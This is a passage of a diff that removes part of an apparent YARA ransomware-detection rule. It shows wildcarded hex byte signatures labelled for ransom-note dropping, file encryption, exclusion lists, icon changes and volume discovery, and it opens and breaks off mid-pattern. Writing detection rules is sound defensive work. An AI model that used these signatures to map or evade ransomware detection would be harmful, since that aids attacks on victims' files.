-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$drop_ransom_note_v1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
-            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$exclude_from_encryption_v1 = {
-            83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
-        }
-		$exclude_from_encryption_v2_p1 = {
-            50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6
-        }
-		$exclude_from_encryption_v2_p2 = {
-            45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_v5_p1 = {
-            50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
-            8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83
-            C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ??
-            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ??
-            FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83
-        }
-		$encrypt_files_v5_p2 = {
-            C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ??
-            ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45
-            ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ??
-            ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F
-            11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ??
-            39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ??
-            8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85
-            C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ??
-            FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45
-            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57
-            6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57
-            C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B
-            7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03
-            4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ??
-            13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82
-        }
-		$encrypt_files_v6_p1 = {
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ??
-            F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B
-            C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66
-            8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D
-            ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B
-            75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-        }
-		$encrypt_files_v6_p2 = {
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
-            6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ??
-            ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ??
-            FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C
-        }
-		$encrypt_files_v6_p3 = {
-            81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0
-            66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2
-            50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89
-            45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85
-            ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ??
-            ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10
-            05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F
-            11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52
-            50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ??
-            ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50
-            FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D
-        }
-		$set_default_icon_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
-            89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98
-            66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45
-            ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2
-        }
-		$set_default_icon_p2 = {
-            81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
-            51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43
-            45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D
-            ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45
-            ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9
-            ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_system_volumes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ??
-            ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ??
-            C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90
-            8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ??
-            83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2
-            51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ??
-            6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ??
-            EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C
-            4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8
-            ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ??
-            57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$drop_ransom_note_v2_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53
-            56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE
-            ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D
